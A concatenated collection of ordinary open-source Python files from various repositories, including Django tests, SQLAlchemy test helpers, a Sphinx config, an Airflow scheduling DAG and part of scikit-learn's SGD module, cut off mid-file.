def register_functions_ns3_FatalImpl(module, root_module):
return
def register_functions_ns3_Hash(module, root_module):
register_functions_ns3_Hash_Function(module.get_submodule('Function'), root_module)
return
def register_functions_ns3_Hash_Function(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
|
rsvip/Django | refs/heads/master | tests/template_tests/test_logging.py | 210 | from __future__ import unicode_literals
import logging
from django.template import Engine, Variable, VariableDoesNotExist
from django.test import SimpleTestCase
class TestHandler(logging.Handler):
def __init__(self):
super(TestHandler, self).__init__()
self.log_record = None
def emit(self, record):
self.log_record = record
class VariableResolveLoggingTests(SimpleTestCase):
def setUp(self):
self.test_handler = TestHandler()
self.logger = logging.getLogger('django.template')
self.original_level = self.logger.level
self.logger.addHandler(self.test_handler)
self.logger.setLevel(logging.DEBUG)
def tearDown(self):
self.logger.removeHandler(self.test_handler)
self.logger.level = self.original_level
def test_log_on_variable_does_not_exist_silent(self):
class TestObject(object):
class SilentDoesNotExist(Exception):
silent_variable_failure = True
@property
def template_name(self):
return "template"
@property
def template(self):
return Engine().from_string('')
@property
def article(self):
raise TestObject.SilentDoesNotExist("Attribute does not exist.")
def __iter__(self):
return iter(attr for attr in dir(TestObject) if attr[:2] != "__")
def __getitem__(self, item):
return self.__dict__[item]
Variable('article').resolve(TestObject())
self.assertEqual(
self.test_handler.log_record.msg,
'template - Attribute does not exist.'
)
def test_log_on_variable_does_not_exist_not_silent(self):
with self.assertRaises(VariableDoesNotExist):
Variable('article.author').resolve({'article': {'section': 'News'}})
self.assertEqual(
self.test_handler.log_record.msg,
'unknown - Failed lookup for key [author] in %r' %
("{%r: %r}" % ('section', 'News'), )
)
def test_no_log_when_variable_exists(self):
Variable('article.section').resolve({'article': {'section': 'News'}})
self.assertIsNone(self.test_handler.log_record)
|
Nikea/VisTrails | refs/heads/master | vistrails/db/versions/v0_9_0/persistence/xml/xml_dao.py | 16 | ###############################################################################
##
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from datetime import date, datetime
from vistrails.core.system import strftime, time_strptime
class XMLDAO:
def __init__(self):
pass
def hasAttribute(self, node, attr):
return node.hasAttribute(attr)
def getAttribute(self, node, attr):
try:
attribute = node.attributes.get(attr)
if attribute is not None:
return attribute.value
except KeyError:
pass
return None
def convertFromStr(self, value, type):
if value is not None:
if type == 'str':
return str(value)
elif value.strip() != '':
if type == 'long':
return long(value)
elif type == 'float':
return float(value)
elif type == 'int':
return int(value)
elif type == 'date':
return date(*time_strptime(value, '%Y-%m-%d')[0:3])
elif type == 'datetime':
return datetime(*time_strptime(value, '%Y-%m-%d %H:%M:%S')[0:6])
return None
def convertToStr(self, value, type):
if value is not None:
if type == 'date':
return value.isoformat()
elif type == 'datetime':
return strftime(value, '%Y-%m-%d %H:%M:%S')
else:
return str(value)
return ''
|
cbenhagen/kivy | refs/heads/master | examples/includes/main.py | 40 | from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
class SpecialButton(Button):
pass
class CustomLayout(BoxLayout):
pass
class TestApp(App):
pass
if __name__ == '__main__':
TestApp().run()
|
yeatmanlab/AFQ-viz | refs/heads/master | doc/conf.py | 5 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# afqbrowser documentation build configuration file, created by
# sphinx-quickstart on Tue Apr 14 10:29:06 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# General information about the project.
project = 'afqbrowser'
copyright = '2017 -- , Jason Yeatman, Adam Richie-Halford, Josh Smith, Anisha Keshavan, Ariel Rokem, The University of Washington'
currentdir = os.path.abspath(os.path.dirname(__file__))
ver_file = os.path.join(currentdir, '..', project, 'version.py')
with open(ver_file) as f:
exec(f.read())
source_version = __version__
currentdir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(currentdir, 'tools'))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0' # numpydoc requires sphinc >= 1.0
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
sys.path.append(os.path.abspath('sphinxext'))
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.ifconfig',
'sphinx.ext.autosummary',
'sphinx.ext.mathjax',
'math_dollar', # has to go before numpydoc
'numpydoc',
'github',
'sphinx_js']
# Add path to js directory for js auto-documentation
js_source_path = '../afqbrowser/site/client/js/'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# --- Sphinx Gallery ---
sphinx_gallery_conf = {
# To auto-generate example sections in the API
'doc_module': ('afqbrowser',),
# Auto-generated mini-galleries go here
'backreferences_dir': 'gen_api'
}
# Automatically generate stub pages for API
autosummary_generate = True
autodoc_default_flags = ['members', 'inherited-members']
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '_static/escience-logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {'**': ['globaltoc.html', 'searchbox.html']}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
html_domain_indices = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'afqbrowserdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'afqbrowser.tex', 'afqbrowser Documentation',
'Ariel Rokem', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'afqbrowser', 'afqbrowser Documentation',
['Ariel Rokem'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'afqbrowser', 'afqbrowser Documentation',
'Ariel Rokem', 'afqbrowser', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
texinfo_domain_indices = False
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
|
sandan/sqlalchemy | refs/heads/master | lib/sqlalchemy/testing/assertsql.py | 21 | # testing/assertsql.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from ..engine.default import DefaultDialect
from .. import util
import re
import collections
import contextlib
from .. import event
from sqlalchemy.schema import _DDLCompiles
from sqlalchemy.engine.util import _distill_params
from sqlalchemy.engine import url
class AssertRule(object):
is_consumed = False
errormessage = None
consume_statement = True
def process_statement(self, execute_observed):
pass
def no_more_statements(self):
assert False, 'All statements are complete, but pending '\
'assertion rules remain'
class SQLMatchRule(AssertRule):
pass
class CursorSQL(SQLMatchRule):
consume_statement = False
def __init__(self, statement, params=None):
self.statement = statement
self.params = params
def process_statement(self, execute_observed):
stmt = execute_observed.statements[0]
if self.statement != stmt.statement or (
self.params is not None and self.params != stmt.parameters):
self.errormessage = \
"Testing for exact SQL %s parameters %s received %s %s" % (
self.statement, self.params,
stmt.statement, stmt.parameters
)
else:
execute_observed.statements.pop(0)
self.is_consumed = True
if not execute_observed.statements:
self.consume_statement = True
class CompiledSQL(SQLMatchRule):
def __init__(self, statement, params=None, dialect='default'):
self.statement = statement
self.params = params
self.dialect = dialect
def _compare_sql(self, execute_observed, received_statement):
stmt = re.sub(r'[\n\t]', '', self.statement)
return received_statement == stmt
def _compile_dialect(self, execute_observed):
if self.dialect == 'default':
return DefaultDialect()
else:
# ugh
if self.dialect == 'postgresql':
params = {'implicit_returning': True}
else:
params = {}
return url.URL(self.dialect).get_dialect()(**params)
def _received_statement(self, execute_observed):
"""reconstruct the statement and params in terms
of a target dialect, which for CompiledSQL is just DefaultDialect."""
context = execute_observed.context
compare_dialect = self._compile_dialect(execute_observed)
if isinstance(context.compiled.statement, _DDLCompiles):
compiled = \
context.compiled.statement.compile(
dialect=compare_dialect,
schema_translate_map=context.
execution_options.get('schema_translate_map'))
else:
compiled = (
context.compiled.statement.compile(
dialect=compare_dialect,
column_keys=context.compiled.column_keys,
inline=context.compiled.inline,
schema_translate_map=context.
execution_options.get('schema_translate_map'))
)
_received_statement = re.sub(r'[\n\t]', '', util.text_type(compiled))
parameters = execute_observed.parameters
if not parameters:
_received_parameters = [compiled.construct_params()]
else:
_received_parameters = [
compiled.construct_params(m) for m in parameters]
return _received_statement, _received_parameters
def process_statement(self, execute_observed):
context = execute_observed.context
_received_statement, _received_parameters = \
self._received_statement(execute_observed)
params = self._all_params(context)
equivalent = self._compare_sql(execute_observed, _received_statement)
if equivalent:
if params is not None:
all_params = list(params)
all_received = list(_received_parameters)
while all_params and all_received:
param = dict(all_params.pop(0))
for idx, received in enumerate(list(all_received)):
# do a positive compare only
for param_key in param:
# a key in param did not match current
# 'received'
if param_key not in received or \
received[param_key] != param[param_key]:
break
else:
# all keys in param matched 'received';
# onto next param
del all_received[idx]
break
else:
# param did not match any entry
# in all_received
equivalent = False
break
if all_params or all_received:
equivalent = False
if equivalent:
self.is_consumed = True
self.errormessage = None
else:
self.errormessage = self._failure_message(params) % {
'received_statement': _received_statement,
'received_parameters': _received_parameters
}
def _all_params(self, context):
if self.params:
if util.callable(self.params):
params = self.params(context)
else:
params = self.params
if not isinstance(params, list):
params = [params]
return params
else:
return None
def _failure_message(self, expected_params):
return (
'Testing for compiled statement %r partial params %r, '
'received %%(received_statement)r with params '
'%%(received_parameters)r' % (
self.statement.replace('%', '%%'), expected_params
)
)
class RegexSQL(CompiledSQL):
def __init__(self, regex, params=None):
SQLMatchRule.__init__(self)
self.regex = re.compile(regex)
self.orig_regex = regex
self.params = params
self.dialect = 'default'
def _failure_message(self, expected_params):
return (
'Testing for compiled statement ~%r partial params %r, '
'received %%(received_statement)r with params '
'%%(received_parameters)r' % (
self.orig_regex, expected_params
)
)
def _compare_sql(self, execute_observed, received_statement):
return bool(self.regex.match(received_statement))
class DialectSQL(CompiledSQL):
def _compile_dialect(self, execute_observed):
return execute_observed.context.dialect
def _compare_no_space(self, real_stmt, received_stmt):
stmt = re.sub(r'[\n\t]', '', real_stmt)
return received_stmt == stmt
def _received_statement(self, execute_observed):
received_stmt, received_params = super(DialectSQL, self).\
_received_statement(execute_observed)
# TODO: why do we need this part?
for real_stmt in execute_observed.statements:
if self._compare_no_space(real_stmt.statement, received_stmt):
break
else:
raise AssertionError(
"Can't locate compiled statement %r in list of "
"statements actually invoked" % received_stmt)
return received_stmt, execute_observed.context.compiled_parameters
def _compare_sql(self, execute_observed, received_statement):
stmt = re.sub(r'[\n\t]', '', self.statement)
# convert our comparison statement to have the
# paramstyle of the received
paramstyle = execute_observed.context.dialect.paramstyle
if paramstyle == 'pyformat':
stmt = re.sub(
r':([\w_]+)', r"%(\1)s", stmt)
else:
# positional params
repl = None
if paramstyle == 'qmark':
repl = "?"
elif paramstyle == 'format':
repl = r"%s"
elif paramstyle == 'numeric':
repl = None
stmt = re.sub(r':([\w_]+)', repl, stmt)
return received_statement == stmt
class CountStatements(AssertRule):
def __init__(self, count):
self.count = count
self._statement_count = 0
def process_statement(self, execute_observed):
self._statement_count += 1
def no_more_statements(self):
if self.count != self._statement_count:
assert False, 'desired statement count %d does not match %d' \
% (self.count, self._statement_count)
class AllOf(AssertRule):
def __init__(self, *rules):
self.rules = set(rules)
def process_statement(self, execute_observed):
for rule in list(self.rules):
rule.errormessage = None
rule.process_statement(execute_observed)
if rule.is_consumed:
self.rules.discard(rule)
if not self.rules:
self.is_consumed = True
break
elif not rule.errormessage:
# rule is not done yet
self.errormessage = None
break
else:
self.errormessage = list(self.rules)[0].errormessage
class Or(AllOf):
def process_statement(self, execute_observed):
for rule in self.rules:
rule.process_statement(execute_observed)
if rule.is_consumed:
self.is_consumed = True
break
else:
self.errormessage = list(self.rules)[0].errormessage
class SQLExecuteObserved(object):
def __init__(self, context, clauseelement, multiparams, params):
self.context = context
self.clauseelement = clauseelement
self.parameters = _distill_params(multiparams, params)
self.statements = []
class SQLCursorExecuteObserved(
collections.namedtuple(
"SQLCursorExecuteObserved",
["statement", "parameters", "context", "executemany"])
):
pass
class SQLAsserter(object):
def __init__(self):
self.accumulated = []
def _close(self):
self._final = self.accumulated
del self.accumulated
def assert_(self, *rules):
rules = list(rules)
observed = list(self._final)
while observed and rules:
rule = rules[0]
rule.process_statement(observed[0])
if rule.is_consumed:
rules.pop(0)
elif rule.errormessage:
assert False, rule.errormessage
if rule.consume_statement:
observed.pop(0)
if not observed and rules:
rules[0].no_more_statements()
elif not rules and observed:
assert False, "Additional SQL statements remain"
@contextlib.contextmanager
def assert_engine(engine):
asserter = SQLAsserter()
orig = []
@event.listens_for(engine, "before_execute")
def connection_execute(conn, clauseelement, multiparams, params):
# grab the original statement + params before any cursor
# execution
orig[:] = clauseelement, multiparams, params
@event.listens_for(engine, "after_cursor_execute")
def cursor_execute(conn, cursor, statement, parameters,
context, executemany):
if not context:
return
# then grab real cursor statements and associate them all
# around a single context
if asserter.accumulated and \
asserter.accumulated[-1].context is context:
obs = asserter.accumulated[-1]
else:
obs = SQLExecuteObserved(context, orig[0], orig[1], orig[2])
asserter.accumulated.append(obs)
obs.statements.append(
SQLCursorExecuteObserved(
statement, parameters, context, executemany)
)
try:
yield asserter
finally:
event.remove(engine, "after_cursor_execute", cursor_execute)
event.remove(engine, "before_execute", connection_execute)
asserter._close()
|
freenas/samba | refs/heads/freenas/master | third_party/dnspython/examples/name.py | 82 | #!/usr/bin/env python
import dns.name
n = dns.name.from_text('www.dnspython.org')
o = dns.name.from_text('dnspython.org')
print n.is_subdomain(o) # True
print n.is_superdomain(o) # False
print n > o # True
rel = n.relativize(o) # rel is the relative name www
n2 = rel + o
print n2 == n # True
print n.labels # ['www', 'dnspython', 'org', '']
|
fpy171/django | refs/heads/master | tests/decorators/__init__.py | 12133432 | |
CEG-FYP-OpenStack/scheduler | refs/heads/master | nova/network/security_group/__init__.py | 12133432 | |
Clyde-fare/scikit-learn | refs/heads/master | sklearn/tests/__init__.py | 12133432 | |
kool79/intellij-community | refs/heads/master | python/testData/resolve/multiFile/fromPackageImportIntoInit/pack/mod.py | 12133432 | |
google/autobidding-readiness-monitor | refs/heads/master | dags/algo_readiness_scheduler_dag.py | 1 | #
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Scheduler for the Algo Readiness Monitor.
This DAG does 2 things:
1. Records all the advertiser IDs for each partner (needed for SDF reporting) and stores them in an Airflow Variable.
2. Triggers one reporting DAG for each partner. The reporting DAGs are built by the algo_readiness_factory
"""
import datetime
import glob
from airflow import DAG
from airflow import models
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from orchestra.google.marketing_platform.operators.display_video_360 import (
GoogleDisplayVideo360CreateReportOperator,
GoogleDisplayVideo360RunReportOperator,
GoogleDisplayVideo360DeleteReportOperator,
GoogleDisplayVideo360RecordSDFAdvertiserOperator
)
from orchestra.google.marketing_platform.sensors.display_video_360 import (
GoogleDisplayVideo360ReportSensor
)
from gps.utils.resource_helpers import ResourceLoader
import algo_readiness_factory_dag
# Declare config file path and load config
config_file_path = "dashboard.config"
resource_loader = ResourceLoader()
config = resource_loader.load_config(config_file_path)
CONN_ID = config["gcp_connection_id"]
partner_id_list = models.Variable.get("partner_ids").split(",")
def _get_default_args():
"""Builds the default DAG arguments.
Returns:
The default arguments.
"""
yesterday = datetime.datetime.combine(
datetime.datetime.today() - datetime.timedelta(days=1),
datetime.datetime.min.time())
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': yesterday,
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': datetime.timedelta(minutes=5)
}
return default_args
def _get_dag_run_obj(context, dag_run_obj):
return dag_run_obj
def _build(dag_id, default_args):
"""Builds a new DAG defining the Algo Readiness workflow.
Args:
dag_id: The DAG ID.
default_args: The default arguments for the DAG.
Returns:
The DAG object.
"""
config_dag = DAG(dag_id=dag_id, default_args=default_args)
# Define SDF record advertiser tasks
start_workflow = DummyOperator(
task_id='start_workflow',
dag=config_dag)
create_report = GoogleDisplayVideo360CreateReportOperator(
task_id="create_report",
gcp_conn_id=CONN_ID,
report=resource_loader.get_report_path("dv360_adv_report.json"),
params={"partners": partner_id_list},
dag=config_dag)
query_id = "{{ task_instance.xcom_pull('create_report', key='query_id') }}"
run_report = GoogleDisplayVideo360RunReportOperator(
task_id="run_report",
gcp_conn_id=CONN_ID,
query_id=query_id,
dag=config_dag)
wait_for_report = GoogleDisplayVideo360ReportSensor(
task_id="wait_for_report",
gcp_conn_id=CONN_ID,
query_id=query_id,
dag=config_dag)
report_url = "{{ task_instance.xcom_pull('wait_for_report', key='report_url') }}"
record_advertisers = GoogleDisplayVideo360RecordSDFAdvertiserOperator(
task_id='record_advertisers',
conn_id=CONN_ID,
report_url=report_url,
variable_name='dv360_sdf_advertisers',
dag=config_dag)
delete_report = GoogleDisplayVideo360DeleteReportOperator(
task_id="delete_report",
gcp_conn_id=CONN_ID,
query_id=query_id,
dag=config_dag)
# Set dependencies for recording advertisers
start_workflow >> create_report >> run_report >> wait_for_report >> record_advertisers >> delete_report
# Trigger one reporting DAG for each partner
for partner_id in partner_id_list:
trigger_dag_id = algo_readiness_factory_dag.build_dag_id(
partner_id)
trigger_dag_task = TriggerDagRunOperator(
task_id='trigger_%s' % trigger_dag_id,
trigger_dag_id=trigger_dag_id,
python_callable=_get_dag_run_obj,
dag=config_dag)
delete_report.set_downstream(trigger_dag_task)
return config_dag
dag = _build(
dag_id='algo_readiness_scheduler',
default_args=_get_default_args())
|
ndingwall/scikit-learn | refs/heads/master | sklearn/linear_model/_stochastic_gradient.py | 2 | # Authors: Peter Prettenhofer <peter.prettenhofer@gmail.com> (main author)
# Mathieu Blondel (partial_fit support)
#
# License: BSD 3 clause
"""Classification and regression using Stochastic Gradient Descent (SGD)."""
import numpy as np
import warnings
from abc import ABCMeta, abstractmethod
from joblib import Parallel
from ..base import clone, is_classifier
from ._base import LinearClassifierMixin, SparseCoefMixin
from ._base import make_dataset
from ..base import BaseEstimator, RegressorMixin
from ..utils import check_array, check_random_state, check_X_y
from ..utils.extmath import safe_sparse_dot
from ..utils.multiclass import _check_partial_fit_first_call
from ..utils.validation import check_is_fitted, _check_sample_weight
from ..utils.validation import _deprecate_positional_args
from ..utils.fixes import delayed
from ..exceptions import ConvergenceWarning
from ..model_selection import StratifiedShuffleSplit, ShuffleSplit
from ._sgd_fast import _plain_sgd
from ..utils import compute_class_weight
from ._sgd_fast import Hinge
from ._sgd_fast import SquaredHinge
from ._sgd_fast import Log
from ._sgd_fast import ModifiedHuber
from ._sgd_fast import SquaredLoss
from ._sgd_fast import Huber
from ._sgd_fast import EpsilonInsensitive
from ._sgd_fast import SquaredEpsilonInsensitive
from ..utils.fixes import _joblib_parallel_args
from ..utils import deprecated
LEARNING_RATE_TYPES = {"constant": 1, "optimal": 2, "invscaling": 3,
"adaptive": 4, "pa1": 5, "pa2": 6}
PENALTY_TYPES = {"none": 0, "l2": 2, "l1": 1, "elasticnet": 3}
DEFAULT_EPSILON = 0.1
# Default value of ``epsilon`` parameter.
MAX_INT = np.iinfo(np.int32).max
class _ValidationScoreCallback:
"""Callback for early stopping based on validation score"""
def __init__(self, estimator, X_val, y_val, sample_weight_val,
classes=None):
self.estimator = clone(estimator)
self.estimator.t_ = 1 # to pass check_is_fitted
if classes is not None:
self.estimator.classes_ = classes
self.X_val = X_val
self.y_val = y_val
self.sample_weight_val = sample_weight_val
def __call__(self, coef, intercept):
est = self.estimator
est.coef_ = coef.reshape(1, -1)
est.intercept_ = np.atleast_1d(intercept)
return est.score(self.X_val, self.y_val, self.sample_weight_val)
class BaseSGD(SparseCoefMixin, BaseEstimator, metaclass=ABCMeta):
"""Base class for SGD classification and regression."""
@_deprecate_positional_args
def __init__(self, loss, *, penalty='l2', alpha=0.0001, C=1.0,
l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,
shuffle=True, verbose=0, epsilon=0.1, random_state=None,
learning_rate="optimal", eta0=0.0, power_t=0.5,
early_stopping=False, validation_fraction=0.1,
n_iter_no_change=5, warm_start=False, average=False):
self.loss = loss
self.penalty = penalty
self.learning_rate = learning_rate
self.epsilon = epsilon
self.alpha = alpha
self.C = C
self.l1_ratio = l1_ratio
self.fit_intercept = fit_intercept
self.shuffle = shuffle
self.random_state = random_state
self.verbose = verbose
self.eta0 = eta0
self.power_t = power_t
self.early_stopping = early_stopping
self.validation_fraction = validation_fraction
self.n_iter_no_change = n_iter_no_change
self.warm_start = warm_start
self.average = average
self.max_iter = max_iter
self.tol = tol
# current tests expect init to do parameter validation
# but we are not allowed to set attributes
self._validate_params()
def set_params(self, **kwargs):
"""Set and validate the parameters of estimator.
Parameters
----------
**kwargs : dict
Estimator parameters.
Returns
-------
self : object
Estimator instance.
"""
super().set_params(**kwargs)
self._validate_params()
return self
@abstractmethod
def fit(self, X, y):
"""Fit model."""
def _validate_params(self, for_partial_fit=False):
"""Validate input params. """
if not isinstance(self.shuffle, bool):
raise ValueError("shuffle must be either True or False")
if not isinstance(self.early_stopping, bool):
raise ValueError("early_stopping must be either True or False")
if self.early_stopping and for_partial_fit:
raise ValueError("early_stopping should be False with partial_fit")
if self.max_iter is not None and self.max_iter <= 0:
raise ValueError("max_iter must be > zero. Got %f" % self.max_iter)
if not (0.0 <= self.l1_ratio <= 1.0):
raise ValueError("l1_ratio must be in [0, 1]")
if self.alpha < 0.0:
raise ValueError("alpha must be >= 0")
if self.n_iter_no_change < 1:
raise ValueError("n_iter_no_change must be >= 1")
if not (0.0 < self.validation_fraction < 1.0):
raise ValueError("validation_fraction must be in range (0, 1)")
if self.learning_rate in ("constant", "invscaling", "adaptive"):
if self.eta0 <= 0.0:
raise ValueError("eta0 must be > 0")
if self.learning_rate == "optimal" and self.alpha == 0:
raise ValueError("alpha must be > 0 since "
"learning_rate is 'optimal'. alpha is used "
"to compute the optimal learning rate.")
# raises ValueError if not registered
self._get_penalty_type(self.penalty)
self._get_learning_rate_type(self.learning_rate)
if self.loss not in self.loss_functions:
raise ValueError("The loss %s is not supported. " % self.loss)
def _get_loss_function(self, loss):
"""Get concrete ``LossFunction`` object for str ``loss``. """
try:
loss_ = self.loss_functions[loss]
loss_class, args = loss_[0], loss_[1:]
if loss in ('huber', 'epsilon_insensitive',
'squared_epsilon_insensitive'):
args = (self.epsilon, )
return loss_class(*args)
except KeyError as e:
raise ValueError("The loss %s is not supported. " % loss) from e
def _get_learning_rate_type(self, learning_rate):
try:
return LEARNING_RATE_TYPES[learning_rate]
except KeyError as e:
raise ValueError("learning rate %s "
"is not supported. " % learning_rate) from e
def _get_penalty_type(self, penalty):
penalty = str(penalty).lower()
try:
return PENALTY_TYPES[penalty]
except KeyError as e:
raise ValueError("Penalty %s is not supported. " % penalty) from e
def _allocate_parameter_mem(self, n_classes, n_features, coef_init=None,
intercept_init=None):
"""Allocate mem for parameters; initialize if provided."""
if n_classes > 2:
# allocate coef_ for multi-class
if coef_init is not None:
coef_init = np.asarray(coef_init, order="C")
if coef_init.shape != (n_classes, n_features):
raise ValueError("Provided ``coef_`` does not match "
"dataset. ")
self.coef_ = coef_init
else:
self.coef_ = np.zeros((n_classes, n_features),
dtype=np.float64, order="C")
# allocate intercept_ for multi-class
if intercept_init is not None:
